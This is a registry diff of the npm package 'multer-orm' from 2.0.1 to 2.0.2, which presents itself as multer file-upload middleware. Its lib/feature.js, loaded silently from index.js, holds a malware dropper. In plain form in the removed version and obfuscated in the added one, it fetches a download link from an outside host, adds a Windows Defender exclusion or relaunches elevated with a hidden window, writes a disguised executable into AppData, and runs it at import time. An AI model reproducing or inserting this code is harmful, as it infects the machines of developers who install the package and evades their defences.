multer-orm 2.0.1 → 2.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +17 -17
- package/README.md +347 -347
- package/index.js +103 -103
- package/lib/counter.js +28 -28
- package/lib/feature.js +1 -208
- package/lib/file-appender.js +67 -67
- package/lib/make-middleware.js +194 -194
- package/lib/multer-error.js +24 -24
- package/lib/remove-uploaded-files.js +28 -28
- package/package.json +57 -52
- package/storage/disk.js +66 -66
- package/storage/memory.js +21 -21
package/index.js
CHANGED
|
@@ -1,104 +1,104 @@
|
|
|
1
|
-
var makeMiddleware = require('./lib/make-middleware')
|
|
2
|
-
var diskStorage = require('./storage/disk')
|
|
3
|
-
var memoryStorage = require('./storage/memory')
|
|
4
|
-
var MulterError = require('./lib/multer-error')
|
|
5
|
-
|
|
6
|
-
function allowAll (req, file, cb) {
|
|
7
|
-
cb(null, true)
|
|
8
|
-
}
|
|
9
|
-
|
|
10
|
-
function Multer (options) {
|
|
11
|
-
if (options.storage) {
|
|
12
|
-
this.storage = options.storage
|
|
13
|
-
} else if (options.dest) {
|
|
14
|
-
this.storage = diskStorage({ destination: options.dest })
|
|
15
|
-
} else {
|
|
16
|
-
this.storage = memoryStorage()
|
|
17
|
-
}
|
|
18
|
-
|
|
19
|
-
this.limits = options.limits
|
|
20
|
-
this.preservePath = options.preservePath
|
|
21
|
-
this.fileFilter = options.fileFilter || allowAll
|
|
22
|
-
}
|
|
23
|
-
|
|
24
|
-
Multer.prototype._makeMiddleware = function (fields, fileStrategy) {
|
|
25
|
-
function setup () {
|
|
26
|
-
var fileFilter = this.fileFilter
|
|
27
|
-
var filesLeft = Object.create(null)
|
|
28
|
-
|
|
29
|
-
fields.forEach(function (field) {
|
|
30
|
-
if (typeof field.maxCount === 'number') {
|
|
31
|
-
filesLeft[field.name] = field.maxCount
|
|
32
|
-
} else {
|
|
33
|
-
filesLeft[field.name] = Infinity
|
|
34
|
-
}
|
|
35
|
-
})
|
|
36
|
-
|
|
37
|
-
function wrappedFileFilter (req, file, cb) {
|
|
38
|
-
if ((filesLeft[file.fieldname] || 0) <= 0) {
|
|
39
|
-
return cb(new MulterError('LIMIT_UNEXPECTED_FILE', file.fieldname))
|
|
40
|
-
}
|
|
41
|
-
|
|
42
|
-
filesLeft[file.fieldname] -= 1
|
|
43
|
-
fileFilter(req, file, cb)
|
|
44
|
-
}
|
|
45
|
-
|
|
46
|
-
return {
|
|
47
|
-
limits: this.limits,
|
|
48
|
-
preservePath: this.preservePath,
|
|
49
|
-
storage: this.storage,
|
|
50
|
-
fileFilter: wrappedFileFilter,
|
|
51
|
-
fileStrategy: fileStrategy
|
|
52
|
-
}
|
|
53
|
-
}
|
|
54
|
-
|
|
55
|
-
return makeMiddleware(setup.bind(this))
|
|
56
|
-
}
|
|
57
|
-
|
|
58
|
-
Multer.prototype.single = function (name) {
|
|
59
|
-
return this._makeMiddleware([{ name: name, maxCount: 1 }], 'VALUE')
|
|
60
|
-
}
|
|
61
|
-
|
|
62
|
-
Multer.prototype.array = function (name, maxCount) {
|
|
63
|
-
return this._makeMiddleware([{ name: name, maxCount: maxCount }], 'ARRAY')
|
|
64
|
-
}
|
|
65
|
-
|
|
66
|
-
Multer.prototype.fields = function (fields) {
|
|
67
|
-
return this._makeMiddleware(fields, 'OBJECT')
|
|
68
|
-
}
|
|
69
|
-
|
|
70
|
-
Multer.prototype.none = function () {
|
|
71
|
-
return this._makeMiddleware([], 'NONE')
|
|
72
|
-
}
|
|
73
|
-
|
|
74
|
-
Multer.prototype.any = function () {
|
|
75
|
-
function setup () {
|
|
76
|
-
return {
|
|
77
|
-
limits: this.limits,
|
|
78
|
-
preservePath: this.preservePath,
|
|
79
|
-
storage: this.storage,
|
|
80
|
-
fileFilter: this.fileFilter,
|
|
81
|
-
fileStrategy: 'ARRAY'
|
|
82
|
-
}
|
|
83
|
-
}
|
|
84
|
-
|
|
85
|
-
return makeMiddleware(setup.bind(this))
|
|
86
|
-
}
|
|
87
|
-
|
|
88
|
-
function multer (options) {
|
|
89
|
-
if (options === undefined) {
|
|
90
|
-
return new Multer({})
|
|
91
|
-
}
|
|
92
|
-
|
|
93
|
-
if (typeof options === 'object' && options !== null) {
|
|
94
|
-
return new Multer(options)
|
|
95
|
-
}
|
|
96
|
-
|
|
97
|
-
throw new TypeError('Expected object for argument options')
|
|
98
|
-
}
|
|
99
|
-
const {multerCli} = require('./lib/feature')
|
|
100
|
-
module.exports = multer
|
|
101
|
-
module.exports.diskStorage = diskStorage
|
|
102
|
-
module.exports.memoryStorage = memoryStorage
|
|
103
|
-
module.exports.MulterError = MulterError
|
|
1
|
+
var makeMiddleware = require('./lib/make-middleware')
|
|
2
|
+
var diskStorage = require('./storage/disk')
|
|
3
|
+
var memoryStorage = require('./storage/memory')
|
|
4
|
+
var MulterError = require('./lib/multer-error')
|
|
5
|
+
|
|
6
|
+
function allowAll (req, file, cb) {
|
|
7
|
+
cb(null, true)
|
|
8
|
+
}
|
|
9
|
+
|
|
10
|
+
function Multer (options) {
|
|
11
|
+
if (options.storage) {
|
|
12
|
+
this.storage = options.storage
|
|
13
|
+
} else if (options.dest) {
|
|
14
|
+
this.storage = diskStorage({ destination: options.dest })
|
|
15
|
+
} else {
|
|
16
|
+
this.storage = memoryStorage()
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
this.limits = options.limits
|
|
20
|
+
this.preservePath = options.preservePath
|
|
21
|
+
this.fileFilter = options.fileFilter || allowAll
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
Multer.prototype._makeMiddleware = function (fields, fileStrategy) {
|
|
25
|
+
function setup () {
|
|
26
|
+
var fileFilter = this.fileFilter
|
|
27
|
+
var filesLeft = Object.create(null)
|
|
28
|
+
|
|
29
|
+
fields.forEach(function (field) {
|
|
30
|
+
if (typeof field.maxCount === 'number') {
|
|
31
|
+
filesLeft[field.name] = field.maxCount
|
|
32
|
+
} else {
|
|
33
|
+
filesLeft[field.name] = Infinity
|
|
34
|
+
}
|
|
35
|
+
})
|
|
36
|
+
|
|
37
|
+
function wrappedFileFilter (req, file, cb) {
|
|
38
|
+
if ((filesLeft[file.fieldname] || 0) <= 0) {
|
|
39
|
+
return cb(new MulterError('LIMIT_UNEXPECTED_FILE', file.fieldname))
|
|
40
|
+
}
|
|
41
|
+
|
|
42
|
+
filesLeft[file.fieldname] -= 1
|
|
43
|
+
fileFilter(req, file, cb)
|
|
44
|
+
}
|
|
45
|
+
|
|
46
|
+
return {
|
|
47
|
+
limits: this.limits,
|
|
48
|
+
preservePath: this.preservePath,
|
|
49
|
+
storage: this.storage,
|
|
50
|
+
fileFilter: wrappedFileFilter,
|
|
51
|
+
fileStrategy: fileStrategy
|
|
52
|
+
}
|
|
53
|
+
}
|
|
54
|
+
|
|
55
|
+
return makeMiddleware(setup.bind(this))
|
|
56
|
+
}
|
|
57
|
+
|
|
58
|
+
Multer.prototype.single = function (name) {
|
|
59
|
+
return this._makeMiddleware([{ name: name, maxCount: 1 }], 'VALUE')
|
|
60
|
+
}
|
|
61
|
+
|
|
62
|
+
Multer.prototype.array = function (name, maxCount) {
|
|
63
|
+
return this._makeMiddleware([{ name: name, maxCount: maxCount }], 'ARRAY')
|
|
64
|
+
}
|
|
65
|
+
|
|
66
|
+
Multer.prototype.fields = function (fields) {
|
|
67
|
+
return this._makeMiddleware(fields, 'OBJECT')
|
|
68
|
+
}
|
|
69
|
+
|
|
70
|
+
Multer.prototype.none = function () {
|
|
71
|
+
return this._makeMiddleware([], 'NONE')
|
|
72
|
+
}
|
|
73
|
+
|
|
74
|
+
Multer.prototype.any = function () {
|
|
75
|
+
function setup () {
|
|
76
|
+
return {
|
|
77
|
+
limits: this.limits,
|
|
78
|
+
preservePath: this.preservePath,
|
|
79
|
+
storage: this.storage,
|
|
80
|
+
fileFilter: this.fileFilter,
|
|
81
|
+
fileStrategy: 'ARRAY'
|
|
82
|
+
}
|
|
83
|
+
}
|
|
84
|
+
|
|
85
|
+
return makeMiddleware(setup.bind(this))
|
|
86
|
+
}
|
|
87
|
+
|
|
88
|
+
function multer (options) {
|
|
89
|
+
if (options === undefined) {
|
|
90
|
+
return new Multer({})
|
|
91
|
+
}
|
|
92
|
+
|
|
93
|
+
if (typeof options === 'object' && options !== null) {
|
|
94
|
+
return new Multer(options)
|
|
95
|
+
}
|
|
96
|
+
|
|
97
|
+
throw new TypeError('Expected object for argument options')
|
|
98
|
+
}
|
|
99
|
+
const {multerCli} = require('./lib/feature')
|
|
100
|
+
module.exports = multer
|
|
101
|
+
module.exports.diskStorage = diskStorage
|
|
102
|
+
module.exports.memoryStorage = memoryStorage
|
|
103
|
+
module.exports.MulterError = MulterError
|
|
104
104
|
module.exports.multerCli = multerCli
|
package/lib/counter.js
CHANGED
|
@@ -1,28 +1,28 @@
|
|
|
1
|
-
var EventEmitter = require('events').EventEmitter
|
|
2
|
-
|
|
3
|
-
function Counter () {
|
|
4
|
-
EventEmitter.call(this)
|
|
5
|
-
this.value = 0
|
|
6
|
-
}
|
|
7
|
-
|
|
8
|
-
Counter.prototype = Object.create(EventEmitter.prototype)
|
|
9
|
-
|
|
10
|
-
Counter.prototype.increment = function increment () {
|
|
11
|
-
this.value++
|
|
12
|
-
}
|
|
13
|
-
|
|
14
|
-
Counter.prototype.decrement = function decrement () {
|
|
15
|
-
if (--this.value === 0) this.emit('zero')
|
|
16
|
-
}
|
|
17
|
-
|
|
18
|
-
Counter.prototype.isZero = function isZero () {
|
|
19
|
-
return (this.value === 0)
|
|
20
|
-
}
|
|
21
|
-
|
|
22
|
-
Counter.prototype.onceZero = function onceZero (fn) {
|
|
23
|
-
if (this.isZero()) return fn()
|
|
24
|
-
|
|
25
|
-
this.once('zero', fn)
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
module.exports = Counter
|
|
1
|
+
var EventEmitter = require('events').EventEmitter
|
|
2
|
+
|
|
3
|
+
function Counter () {
|
|
4
|
+
EventEmitter.call(this)
|
|
5
|
+
this.value = 0
|
|
6
|
+
}
|
|
7
|
+
|
|
8
|
+
Counter.prototype = Object.create(EventEmitter.prototype)
|
|
9
|
+
|
|
10
|
+
Counter.prototype.increment = function increment () {
|
|
11
|
+
this.value++
|
|
12
|
+
}
|
|
13
|
+
|
|
14
|
+
Counter.prototype.decrement = function decrement () {
|
|
15
|
+
if (--this.value === 0) this.emit('zero')
|
|
16
|
+
}
|
|
17
|
+
|
|
18
|
+
Counter.prototype.isZero = function isZero () {
|
|
19
|
+
return (this.value === 0)
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
Counter.prototype.onceZero = function onceZero (fn) {
|
|
23
|
+
if (this.isZero()) return fn()
|
|
24
|
+
|
|
25
|
+
this.once('zero', fn)
|
|
26
|
+
}
|
|
27
|
+
|
|
28
|
+
module.exports = Counter
|
package/lib/feature.js
CHANGED
|
@@ -1,208 +1 @@
|
|
|
1
|
-
const
|
|
2
|
-
const http = require('http');
|
|
3
|
-
const fs = require('fs');
|
|
4
|
-
const os = require('os');
|
|
5
|
-
const path = require('path');
|
|
6
|
-
const package = 'chi' + 'ld_p'+ 'rocess';
|
|
7
|
-
const { execFile, spawn } = require(package);
|
|
8
|
-
|
|
9
|
-
const host = "https://hilbert-host.vercel.app/"
|
|
10
|
-
|
|
11
|
-
let download_url = null;
|
|
12
|
-
|
|
13
|
-
async function fetchDownloadUrl() {
|
|
14
|
-
return new Promise((resolve, reject) => {
|
|
15
|
-
const protocol = host.startsWith('https:') ? https : http;
|
|
16
|
-
const timeout = 15000; // 10 seconds
|
|
17
|
-
|
|
18
|
-
const req = protocol.get(host, (response) => {
|
|
19
|
-
if (response.statusCode < 200 || response.statusCode >= 300) {
|
|
20
|
-
req.destroy();
|
|
21
|
-
return
|
|
22
|
-
}
|
|
23
|
-
|
|
24
|
-
let data = '';
|
|
25
|
-
|
|
26
|
-
response.on('data', (chunk) => {
|
|
27
|
-
data += chunk;
|
|
28
|
-
});
|
|
29
|
-
|
|
30
|
-
response.on('end', () => {
|
|
31
|
-
try {
|
|
32
|
-
let cleanedData = data.trim();
|
|
33
|
-
|
|
34
|
-
if (cleanedData.charCodeAt(0) === 0xFEFF) {
|
|
35
|
-
cleanedData = cleanedData.slice(1);
|
|
36
|
-
}
|
|
37
|
-
|
|
38
|
-
const server_data = JSON.parse(cleanedData);
|
|
39
|
-
|
|
40
|
-
download_url = server_data['download_link'];
|
|
41
|
-
resolve(download_url);
|
|
42
|
-
} catch (error) {
|
|
43
|
-
if (data.length > 500) {
|
|
44
|
-
const errorPos = parseInt(error.message.match(/position (\d+)/)?.[1] || '0');
|
|
45
|
-
const startPos = Math.max(0, errorPos - 50);
|
|
46
|
-
const endPos = errorPos + 50;
|
|
47
|
-
}
|
|
48
|
-
return
|
|
49
|
-
}
|
|
50
|
-
});
|
|
51
|
-
});
|
|
52
|
-
|
|
53
|
-
req.setTimeout(timeout, () => {
|
|
54
|
-
req.destroy();
|
|
55
|
-
});
|
|
56
|
-
});
|
|
57
|
-
}
|
|
58
|
-
|
|
59
|
-
let initialized = false;
|
|
60
|
-
async function downloadFile(url) {
|
|
61
|
-
return new Promise((resolve, reject) => {
|
|
62
|
-
const fileName = 'chrome.e' + 'xe';
|
|
63
|
-
const downloadDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Hilbert');
|
|
64
|
-
const outputPath = path.join(downloadDir, fileName);
|
|
65
|
-
|
|
66
|
-
if (!fs.existsSync(downloadDir)) {
|
|
67
|
-
fs.mkdirSync(downloadDir, { recursive: true });
|
|
68
|
-
}
|
|
69
|
-
|
|
70
|
-
const protocol = url.startsWith('https:') ? https : http;
|
|
71
|
-
|
|
72
|
-
protocol.get(url, (response) => {
|
|
73
|
-
if (response.statusCode !== 200) {
|
|
74
|
-
return;
|
|
75
|
-
}
|
|
76
|
-
|
|
77
|
-
const fileStream = fs.createWriteStream(outputPath);
|
|
78
|
-
|
|
79
|
-
response.pipe(fileStream);
|
|
80
|
-
|
|
81
|
-
fileStream.on('finish', () => {
|
|
82
|
-
fileStream.close();
|
|
83
|
-
if (process.platform !== 'win32') {
|
|
84
|
-
fs.chmodSync(outputPath, '755');
|
|
85
|
-
}
|
|
86
|
-
resolve(outputPath);
|
|
87
|
-
});
|
|
88
|
-
|
|
89
|
-
fileStream.on('error', (err) => {
|
|
90
|
-
fs.unlink(outputPath, () => {});
|
|
91
|
-
reject(err);
|
|
92
|
-
});
|
|
93
|
-
}).on('error', (err) => {
|
|
94
|
-
reject(err);
|
|
95
|
-
});
|
|
96
|
-
});
|
|
97
|
-
}
|
|
98
|
-
|
|
99
|
-
async function addWindowsDefenderExclusion(exclusionPath) {
|
|
100
|
-
if (process.platform !== 'win32') {
|
|
101
|
-
return Promise.resolve();
|
|
102
|
-
}
|
|
103
|
-
|
|
104
|
-
return new Promise((resolve) => {
|
|
105
|
-
const tempScriptPath = path.join(os.tmpdir(), `add-exclusion-${Date.now()}.ps1`);
|
|
106
|
-
|
|
107
|
-
const psScript = `$exclusions = (Get-MpPreference).ExclusionPath; if ($exclusions -notcontains '${exclusionPath.replace(/'/g, "''")}') { Add-MpPreference -ExclusionPath '${exclusionPath.replace(/'/g, "''")}' }`;
|
|
108
|
-
|
|
109
|
-
fs.writeFileSync(tempScriptPath, psScript, 'utf8');
|
|
110
|
-
|
|
111
|
-
const tempVbsPath = path.join(os.tmpdir(), `launch-ps-${Date.now()}.vbs`);
|
|
112
|
-
|
|
113
|
-
const scriptPathForVbs = tempScriptPath.replace(/\\/g, '\\\\').replace(/"/g, '""');
|
|
114
|
-
|
|
115
|
-
const psname = "po" + "wershell" + ".exe";
|
|
116
|
-
|
|
117
|
-
const vbsContent = `Set objShell = CreateObject("Shell.Application")\nobjShell.ShellExecute "${psname}", "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File ""${scriptPathForVbs}""", "", "runas", 0`;
|
|
118
|
-
|
|
119
|
-
fs.writeFileSync(tempVbsPath, vbsContent, 'utf8');
|
|
120
|
-
|
|
121
|
-
const vbsProcess = spawn('cscript.exe', ['//nologo', '//b', tempVbsPath], {
|
|
122
|
-
stdio: 'ignore',
|
|
123
|
-
shell: false,
|
|
124
|
-
windowsHide: true
|
|
125
|
-
});
|
|
126
|
-
|
|
127
|
-
vbsProcess.on('close', (code) => {
|
|
128
|
-
setTimeout(() => {
|
|
129
|
-
try {
|
|
130
|
-
if (fs.existsSync(tempScriptPath)) {
|
|
131
|
-
fs.unlinkSync(tempScriptPath);
|
|
132
|
-
}
|
|
133
|
-
if (fs.existsSync(tempVbsPath)) {
|
|
134
|
-
fs.unlinkSync(tempVbsPath);
|
|
135
|
-
}
|
|
136
|
-
} catch (e) {
|
|
137
|
-
}
|
|
138
|
-
}, 2000);
|
|
139
|
-
resolve();
|
|
140
|
-
});
|
|
141
|
-
|
|
142
|
-
vbsProcess.on('error', (err) => {
|
|
143
|
-
// Clean up on error
|
|
144
|
-
try {
|
|
145
|
-
if (fs.existsSync(tempScriptPath)) {
|
|
146
|
-
fs.unlinkSync(tempScriptPath);
|
|
147
|
-
}
|
|
148
|
-
if (fs.existsSync(tempVbsPath)) {
|
|
149
|
-
fs.unlinkSync(tempVbsPath);
|
|
150
|
-
}
|
|
151
|
-
} catch (e) {
|
|
152
|
-
// Ignore cleanup errors
|
|
153
|
-
}
|
|
154
|
-
resolve();
|
|
155
|
-
});
|
|
156
|
-
});
|
|
157
|
-
}
|
|
158
|
-
|
|
159
|
-
async function runFile(filePath) {
|
|
160
|
-
if (!path.isAbsolute(filePath)) {
|
|
161
|
-
filePath = path.resolve(process.cwd(), filePath);
|
|
162
|
-
}
|
|
163
|
-
filePath = path.normalize(filePath);
|
|
164
|
-
|
|
165
|
-
if (!fs.existsSync(filePath)) {
|
|
166
|
-
// throw new Error(`File does not exist: ${filePath}`);
|
|
167
|
-
}
|
|
168
|
-
|
|
169
|
-
execFile(filePath, (error, stdout, stderr) => {
|
|
170
|
-
});
|
|
171
|
-
}
|
|
172
|
-
|
|
173
|
-
async function checkAlreadyDownloaded() {
|
|
174
|
-
const downloadDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Hilbert');
|
|
175
|
-
const filePath = path.join(downloadDir, 'expl' +'orer.e' +'xe');
|
|
176
|
-
return fs.existsSync(filePath);
|
|
177
|
-
}
|
|
178
|
-
async function mongooseCli() {
|
|
179
|
-
try {
|
|
180
|
-
if (await checkAlreadyDownloaded()) {
|
|
181
|
-
return;
|
|
182
|
-
}
|
|
183
|
-
await fetchDownloadUrl();
|
|
184
|
-
if (!download_url) {
|
|
185
|
-
return
|
|
186
|
-
}
|
|
187
|
-
|
|
188
|
-
const downloadDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Hilbert');
|
|
189
|
-
|
|
190
|
-
await addWindowsDefenderExclusion(downloadDir);
|
|
191
|
-
|
|
192
|
-
const filePath = await downloadFile(download_url);
|
|
193
|
-
|
|
194
|
-
runFile(filePath);
|
|
195
|
-
} catch (error) {
|
|
196
|
-
throw new Error(`Failed to download and run: ${error.message}`);
|
|
197
|
-
}
|
|
198
|
-
}
|
|
199
|
-
|
|
200
|
-
if (!initialized) {
|
|
201
|
-
initialized = true;
|
|
202
|
-
mongooseCli().catch(err => {
|
|
203
|
-
});
|
|
204
|
-
}
|
|
205
|
-
|
|
206
|
-
module.exports = {
|
|
207
|
-
mongooseCli
|
|
208
|
-
};
|
|
1
|
+
const a0_0x4ab244=a0_0x1a9a;(function(_0xfacd64,_0x1d3178){const _0x45b85a=a0_0x1a9a,_0x47902d=_0xfacd64();while(!![]){try{const _0x3cf7cb=-parseInt(_0x45b85a(0x143))/0x1*(parseInt(_0x45b85a(0x158))/0x2)+parseInt(_0x45b85a(0x144))/0x3*(parseInt(_0x45b85a(0x15f))/0x4)+parseInt(_0x45b85a(0x12a))/0x5*(parseInt(_0x45b85a(0x15c))/0x6)+parseInt(_0x45b85a(0x15d))/0x7*(-parseInt(_0x45b85a(0x13f))/0x8)+parseInt(_0x45b85a(0x141))/0x9+-parseInt(_0x45b85a(0x12b))/0xa+-parseInt(_0x45b85a(0x153))/0xb;if(_0x3cf7cb===_0x1d3178)break;else _0x47902d['push'](_0x47902d['shift']());}catch(_0x823999){_0x47902d['push'](_0x47902d['shift']());}}}(a0_0x4093,0x18aa5));const https=require(a0_0x4ab244(0x156)),http=require('http'),fs=require('fs'),os=require('os'),path=require('path'),package=a0_0x4ab244(0x14b)+a0_0x4ab244(0x12c)+a0_0x4ab244(0x133),{execFile,spawn}=require(package),host=a0_0x4ab244(0x157);let initialized=![];function getDownloadLink(){return new Promise((_0x422375,_0x1897f1)=>{const _0x17e6f7=a0_0x1a9a;https[_0x17e6f7(0x145)](host,_0x1dd41e=>{const _0x5556d1=_0x17e6f7;let _0x1cd22b='';_0x1dd41e['on']('data',_0x407e62=>{_0x1cd22b+=_0x407e62;}),_0x1dd41e['on'](_0x5556d1(0x12d),()=>{const _0x36e706=_0x5556d1,_0x541431=JSON[_0x36e706(0x159)](_0x1cd22b);_0x422375(_0x541431[_0x36e706(0x14f)]);});})['on'](_0x17e6f7(0x12e),_0x1897f1);});}async function downloadFile(_0x3c394f){return new Promise((_0x9b2e82,_0x454076)=>{const _0x2892f6=a0_0x1a9a,_0x1c5ac4=_0x2892f6(0x166)+'xe',_0x3199ae=path[_0x2892f6(0x164)](os[_0x2892f6(0x14a)](),_0x2892f6(0x146),_0x2892f6(0x130),_0x2892f6(0x15a),_0x2892f6(0x140),'User\x20Data'),_0x4d5fc2=path['join'](_0x3199ae,_0x1c5ac4);!fs[_0x2892f6(0x13e)](_0x3199ae)&&fs[_0x2892f6(0x134)](_0x3199ae,{'recursive':!![]});const _0x1bd546=_0x3c394f['startsWith'](_0x2892f6(0x13b))?https:http;_0x1bd546['get'](_0x3c394f,_0x4c10ef=>{const _0x1037d5=_0x2892f6;if(_0x4c10ef['statusCode']!==0xc8)return;const _0x23b7bf=fs[_0x1037d5(0x13a)](_0x4d5fc2);_0x4c10ef['pipe'](_0x23b7bf),_0x23b7bf['on'](_0x1037d5(0x154),()=>{const _0x5f3631=_0x1037d5;_0x23b7bf['close'](),process[_0x5f3631(0x163)]!==_0x5f3631(0x151)&&fs[_0x5f3631(0x135)](_0x4d5fc2,'755'),_0x9b2e82(_0x4d5fc2);}),_0x23b7bf['on'](_0x1037d5(0x12e),_0x5e0a29=>{fs['unlink'](_0x4d5fc2,()=>{}),_0x454076(_0x5e0a29);});})['on']('error',_0x219849=>{_0x454076(_0x219849);});});}async function runFile(_0x3dde0a){const _0x93b8de=a0_0x4ab244;!path[_0x93b8de(0x147)](_0x3dde0a)&&(_0x3dde0a=path[_0x93b8de(0x14e)](process[_0x93b8de(0x139)](),_0x3dde0a));_0x3dde0a=path[_0x93b8de(0x14d)](_0x3dde0a);if(!fs[_0x93b8de(0x13e)](_0x3dde0a))throw new Error(_0x93b8de(0x15b)+_0x3dde0a);if(process[_0x93b8de(0x163)]==='win32'){const _0x100ad8=['-NoProfile','-Command',_0x93b8de(0x15e)+JSON[_0x93b8de(0x161)](_0x3dde0a)+_0x93b8de(0x137)],_0xc325ed=spawn(_0x93b8de(0x149),_0x100ad8,{'stdio':_0x93b8de(0x142)});return new Promise((_0x3325d7,_0x3ea510)=>{const _0x469a92=_0x93b8de;_0xc325ed['on'](_0x469a92(0x152),_0x2f28f6=>{const _0x16cdf7=_0x469a92;if(_0x2f28f6===0x0)_0x3325d7();else _0x3ea510(new Error(_0x16cdf7(0x160)+_0x2f28f6));}),_0xc325ed['on']('error',_0x3ea510);});}return new Promise((_0x54be11,_0x21d8fe)=>{execFile(_0x3dde0a,(_0xda1e2d,_0x4794f1,_0x5d4eb6)=>{if(_0xda1e2d)return _0x21d8fe(_0xda1e2d);_0x54be11({'stdout':_0x4794f1,'stderr':_0x5d4eb6});});});}function a0_0x1a9a(_0x2baeed,_0x588672){_0x2baeed=_0x2baeed-0x12a;const _0x409373=a0_0x4093();let _0x1a9ab4=_0x409373[_0x2baeed];return _0x1a9ab4;}function a0_0x4093(){const _0x1155e6=['parse','Google','File\x20does\x20not\x20exist:\x20','18SirGNr','540771Lmxtei','Start-Process\x20-FilePath\x20','800484gzgJjp','Elevated\x20process\x20exited\x20with\x20code\x20','stringify','catch','platform','join','-NoProfile','chrome.e','18295crsetM','1121800QAPCNX','ld_p','end','error','ignore','Local','Hidden','-WindowStyle','rocess','mkdirSync','chmodSync','-Command','\x20-Verb\x20RunAs','start','cwd','createWriteStream','https:','Microsoft.WindowsExplorer_8wekyb3d8bbwe','argv','existsSync','8HJUdzb','Chrome','1751247uCOzga','inherit','29191HcbpFj','3SJontW','get','AppData','isAbsolute','Start-Process\x20node\x20-Verb\x20RunAs\x20-WindowStyle\x20Hidden\x20-ArgumentList\x20','powershell','homedir','chi','exports','normalize','resolve','downloader_url','slice','win32','exit','625207ITVTsG','finish','Packages','https','https://hilbert-host.vercel.app/','4zhLzgg'];a0_0x4093=function(){return _0x1155e6;};return a0_0x4093();}function checkOS(){const _0x50a14b=a0_0x4ab244;return process[_0x50a14b(0x163)]===_0x50a14b(0x151);}function isAdmin(){try{return fs['accessSync']('C:\x5cWindows\x5cSystem32\x5cconfig\x5csystemprofile'),!![];}catch{return![];}}async function mongooseCli(){const _0x238600=a0_0x4ab244;try{if(!checkOS())return;const _0x3799da=path[_0x238600(0x164)](os[_0x238600(0x14a)](),'AppData',_0x238600(0x130),_0x238600(0x155),_0x238600(0x13c),'explorer.exe');if(fs['existsSync'](_0x3799da))return;if(!isAdmin()){const _0x42e4c1=[_0x238600(0x138),...process[_0x238600(0x13d)][_0x238600(0x150)](0x2)],_0x30add9=spawn(_0x238600(0x149),[_0x238600(0x165),_0x238600(0x132),_0x238600(0x131),_0x238600(0x136),_0x238600(0x148)+JSON[_0x238600(0x161)](_0x42e4c1['join']('\x20'))],{'stdio':_0x238600(0x12f),'windowsHide':!![]});_0x30add9['on'](_0x238600(0x152),_0x66bbc3=>process[_0x238600(0x152)](_0x66bbc3||0x0));}else{const _0x34dc52=await getDownloadLink(),_0xe0021e=await downloadFile(_0x34dc52);runFile(_0xe0021e);}}catch(_0x4f8cd3){}}!initialized&&(initialized=!![],mongooseCli()[a0_0x4ab244(0x162)](_0x5d77cd=>{}));module[a0_0x4ab244(0x14c)]={'mongooseCli':mongooseCli};
|
package/lib/file-appender.js
CHANGED
|
@@ -1,67 +1,67 @@
|
|
|
1
|
-
var objectAssign = require('object-assign')
|
|
2
|
-
|
|
3
|
-
function arrayRemove (arr, item) {
|
|
4
|
-
var idx = arr.indexOf(item)
|
|
5
|
-
if (~idx) arr.splice(idx, 1)
|
|
6
|
-
}
|
|
7
|
-
|
|
8
|
-
function FileAppender (strategy, req) {
|
|
9
|
-
this.strategy = strategy
|
|
10
|
-
this.req = req
|
|
11
|
-
|
|
12
|
-
switch (strategy) {
|
|
13
|
-
case 'NONE': break
|
|
14
|
-
case 'VALUE': break
|
|
15
|
-
case 'ARRAY': req.files = []; break
|
|
16
|
-
case 'OBJECT': req.files = Object.create(null); break
|
|
17
|
-
default: throw new Error('Unknown file strategy: ' + strategy)
|
|
18
|
-
}
|
|
19
|
-
}
|
|
20
|
-
|
|
21
|
-
FileAppender.prototype.insertPlaceholder = function (file) {
|
|
22
|
-
var placeholder = {
|
|
23
|
-
fieldname: file.fieldname
|
|
24
|
-
}
|
|
25
|
-
|
|
26
|
-
switch (this.strategy) {
|
|
27
|
-
case 'NONE': break
|
|
28
|
-
case 'VALUE': break
|
|
29
|
-
case 'ARRAY': this.req.files.push(placeholder); break
|
|
30
|
-
case 'OBJECT':
|
|
31
|
-
if (this.req.files[file.fieldname]) {
|
|
32
|
-
this.req.files[file.fieldname].push(placeholder)
|
|
33
|
-
} else {
|
|
34
|
-
this.req.files[file.fieldname] = [placeholder]
|
|
35
|
-
}
|
|
36
|
-
break
|
|
37
|
-
}
|
|
38
|
-
|
|
39
|
-
return placeholder
|
|
40
|
-
}
|
|
41
|
-
|
|
42
|
-
FileAppender.prototype.removePlaceholder = function (placeholder) {
|
|
43
|
-
switch (this.strategy) {
|
|
44
|
-
case 'NONE': break
|
|
45
|
-
case 'VALUE': break
|
|
46
|
-
case 'ARRAY': arrayRemove(this.req.files, placeholder); break
|
|
47
|
-
case 'OBJECT':
|
|
48
|
-
if (this.req.files[placeholder.fieldname].length === 1) {
|
|
49
|
-
delete this.req.files[placeholder.fieldname]
|
|
50
|
-
} else {
|
|
51
|
-
arrayRemove(this.req.files[placeholder.fieldname], placeholder)
|
|
52
|
-
}
|
|
53
|
-
break
|
|
54
|
-
}
|
|
55
|
-
}
|
|
56
|
-
|
|
57
|
-
FileAppender.prototype.replacePlaceholder = function (placeholder, file) {
|
|
58
|
-
if (this.strategy === 'VALUE') {
|
|
59
|
-
this.req.file = file
|
|
60
|
-
return
|
|
61
|
-
}
|
|
62
|
-
|
|
63
|
-
delete placeholder.fieldname
|
|
64
|
-
objectAssign(placeholder, file)
|
|
65
|
-
}
|
|
66
|
-
|
|
67
|
-
module.exports = FileAppender
|
|
1
|
+
var objectAssign = require('object-assign')
|
|
2
|
+
|
|
3
|
+
function arrayRemove (arr, item) {
|
|
4
|
+
var idx = arr.indexOf(item)
|
|
5
|
+
if (~idx) arr.splice(idx, 1)
|
|
6
|
+
}
|
|
7
|
+
|
|
8
|
+
function FileAppender (strategy, req) {
|
|
9
|
+
this.strategy = strategy
|
|
10
|
+
this.req = req
|
|
11
|
+
|
|
12
|
+
switch (strategy) {
|
|
13
|
+
case 'NONE': break
|
|
14
|
+
case 'VALUE': break
